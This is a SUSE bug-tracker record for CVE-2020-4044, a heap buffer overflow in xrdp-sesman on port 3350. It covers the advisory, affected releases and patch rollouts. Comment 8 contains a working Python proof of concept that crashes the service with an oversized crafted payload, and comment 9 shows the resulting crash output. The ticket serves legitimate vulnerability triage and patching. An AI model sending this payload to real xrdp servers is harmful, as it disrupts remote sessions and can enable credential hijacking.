Bug 1173580 (CVE-2020-4044)

Summary: VUL-0: CVE-2020-4044: xrdp: xrdp-sesman can be crashed remotely over port 3350
Product: [Novell Products] SUSE Security Incidents Reporter: Wolfgang Frisch <wolfgang.frisch>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Major    
Priority: P2 - High CC: gabriele.sonnu, gianluca.gabrielli, rfrohl, smash_bz, thomas.leroy, yfjiang, yu.daike, zcjia
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/262631/
Whiteboard: CVSSv3.1:SUSE:CVE-2020-4044:7.1:(AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H)
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Wolfgang Frisch 2020-07-01 13:18:36 UTC 
CVE-2020-4044

The xrdp-sesman service before version 0.9.13.1 can be crashed by connecting
over port 3350 and supplying a malicious payload. Once the xrdp-sesman process
is dead, an unprivileged attacker on the server could then proceed to start
their own imposter sesman service listening on port 3350. This will allow them
to capture any user credentials that are submitted to XRDP and approve or reject
arbitrary login credentials. For xorgxrdp sessions in particular, this allows an
unauthorized user to hijack an existing session. This is a buffer overflow
attack, so there may be a risk of arbitrary code execution as well.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-4044
https://github.com/neutrinolabs/xrdp/security/advisories/GHSA-j9fv-6fwf-p3g4
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4044
https://github.com/neutrinolabs/xrdp/commit/0c791d073d0eb344ee7aaafd221513dc9226762c
https://github.com/neutrinolabs/xrdp/releases/tag/v0.9.13.1
Comment 1 Wolfgang Frisch 2020-07-01 14:16:48 UTC 
There is no reproducer yet.

Judging by the patch, at least the following code streams are affected:
SUSE:SLE-12-SP2:Update   xrdp      Affected
SUSE:SLE-12-SP3:Update   xrdp      Affected
SUSE:SLE-12-SP5:Update   xrdp      Affected
SUSE:SLE-15:Update       xrdp      Affected
SUSE:SLE-15-SP2:Update   xrdp      Affected

The impact still needs to be determined for:
SUSE:SLE-11-SP3:Update
SUSE:SLE-11-SP4:Update
Comment 6 Swamp Workflow Management 2020-07-15 13:24:38 UTC 
SUSE-SU-2020:1918-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
Sources used:
SUSE Linux Enterprise Server 12-SP5 (src):    xrdp-0.9.10-3.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 7 Swamp Workflow Management 2020-07-15 16:31:55 UTC 
SUSE-SU-2020:1933-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    xrdp-0.9.6-4.8.1
SUSE Linux Enterprise Server 15-LTSS (src):    xrdp-0.9.6-4.8.1
SUSE Linux Enterprise Module for Basesystem 15-SP1 (src):    xrdp-0.9.6-4.8.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    xrdp-0.9.6-4.8.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    xrdp-0.9.6-4.8.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 8 Wolfgang Frisch 2020-07-16 16:32:49 UTC 
Reproducer:

#!/usr/bin/env python3
"""
    PoC for xrdp CVE-2020-4040
    Wolfgang Frisch <wfrisch@suse.com>
"""
import socket
import sys

host = "127.0.0.1"
port = 3350

payload  = b'\x00\x00\x00\x01\x00\x00'
payload += b'\x27\x2a' # len(payload)
payload += b'\x00\x01\x00\x01\x06\x66\x6f\x6f\x62\x61\x72\x10'
payload += b'\x78' * 10000 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload)
Comment 9 Wolfgang Frisch 2020-07-16 16:38:40 UTC 
ASAN output of recent unpatched version:

>==2629==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000004900 at pc 0x000000439d89 bp 0x7ffd1676cc20 sp 0x7ffd1676c3d0
>WRITE of size 10012 at 0x625000004900 thread T0
>    #0 0x439d88 in __interceptor_recv ../../../../libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:6398
>    #1 0x7f657196a5b1 in g_sck_recv /home/user/xrdp/xrdp/common/os_calls.c:1497
>    #2 0x7f6571924ff4 in scp_tcp_force_recv /home/user/xrdp/xrdp/sesman/libscp/libscp_tcp.c:47
>    #3 0x7f657193d249 in scp_v1s_accept /home/user/xrdp/xrdp/sesman/libscp/libscp_v1s.c:79
>    #4 0x7f657194d1f7 in scp_vXs_accept /home/user/xrdp/xrdp/sesman/libscp/libscp_vX.c:52
>    #5 0x4d4203 in scp_process_start /home/user/xrdp/xrdp/sesman/scp.c:54
>    #6 0x4d6450 in sesman_main_loop /home/user/xrdp/xrdp/sesman/sesman.c:154
>    #7 0x4d70d8 in main /home/user/xrdp/xrdp/sesman/sesman.c:456
>    #8 0x7f65711f5cc9 in __libc_start_main ../csu/libc-start.c:308
>    #9 0x409b79 in _start (/home/user/xrdp/xrdp/sesman/.libs/xrdp-sesman+0x409b79)

SLE-11-SP4 reliably crashes:

>[20200716-18:31:40] [WARN ] [v1s:75] connection aborted: network error
>[20200716-18:31:40] [WARN ] libscp network error.
>*** glibc detected *** xrdp-sesman: double free or corruption (!prev): 0x000000000060ee50 ***
>======= Backtrace: =========
>/lib64/libc.so.6(+0x790e8)[0x7f04c575d0e8]
>/lib64/libc.so.6(cfree+0x6c)[0x7f04c576218c]
>xrdp-sesman[0x4033b5]
>/lib64/libpthread.so.0(+0x7806)[0x7f04c5a67806]
>/lib64/libc.so.6(clone+0x6d)[0x7f04c57c27bd]

Can you please check SLE-11-SP3?
Comment 10 Swamp Workflow Management 2020-07-17 16:22:02 UTC 
SUSE-SU-2020:1943-1: An update that solves two vulnerabilities and has 8 fixes is now available.

Category: security (important)
Bug References: 1138954,1144327,1144379,1150584,1152711,1153471,1155789,1155952,1157860,1173580
CVE References: CVE-2017-6967,CVE-2020-4044
Sources used:
SUSE OpenStack Cloud 7 (src):    xrdp-0.9.0~git.1456906198.f422461-16.20.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    xrdp-0.9.0~git.1456906198.f422461-16.20.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    xrdp-0.9.0~git.1456906198.f422461-16.20.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    xrdp-0.9.0~git.1456906198.f422461-16.20.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 11 Swamp Workflow Management 2020-07-18 22:13:53 UTC 
openSUSE-SU-2020:0999-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
Sources used:
openSUSE Leap 15.1 (src):    xrdp-0.9.6-lp151.4.6.1
Comment 12 Swamp Workflow Management 2020-07-21 22:14:05 UTC 
SUSE-SU-2020:1991-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE OpenStack Cloud Crowbar 8 (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE OpenStack Cloud 9 (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE OpenStack Cloud 8 (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Enterprise Storage 5 (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1
HPE Helion Openstack 8 (src):    xrdp-0.9.0~git.1456906198.f422461-21.27.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 14 Swamp Workflow Management 2020-08-06 13:15:32 UTC 
SUSE-SU-2020:2142-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
JIRA References: 
Sources used:
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    xrdp-0.9.13.1-4.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 15 Swamp Workflow Management 2020-08-14 19:24:25 UTC 
openSUSE-SU-2020:1200-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    xrdp-0.9.13.1-lp152.3.3.1
Comment 21 Yifan Jiang 2022-08-09 07:36:48 UTC 
Thanks for the clarification, Daike is newly joining to work on the remote desktop stack. He was working on the backport, so I will redirect the requirement to him.

Daike, can you please help on this?
Comment 22 Thomas Leroy 2022-09-06 09:40:02 UTC 
(In reply to Yifan Jiang from comment #21)
> Thanks for the clarification, Daike is newly joining to work on the remote
> desktop stack. He was working on the backport, so I will redirect the
> requirement to him.
> 
> Daike, can you please help on this?

Thanks of handling this Daike. Have you done any progress on the backport on 11sp3? :)
Comment 23 Yifan Jiang 2022-09-06 10:01:54 UTC 
(In reply to Thomas Leroy from comment #22)
> (In reply to Yifan Jiang from comment #21)
> > Thanks for the clarification, Daike is newly joining to work on the remote
> > desktop stack. He was working on the backport, so I will redirect the
> > requirement to him.
> > 
> > Daike, can you please help on this?
> 
> Thanks of handling this Daike. Have you done any progress on the backport on
> 11sp3? :)

I happened to have a conversation with Daike this afternoon, the backport across too many major versions and it needs line-to-line alignment of both code logic and lexical correctness. I know Daike is in the middle of dealing with it.
Comment 29 Jia Zhaocong 2022-10-20 02:14:28 UTC 
Cleaning up GNOME CVE backlog. The fix has been submitted and accepted. Assign back to security team.
Comment 30 Robert Frohl 2022-10-20 07:39:05 UTC 
done, closing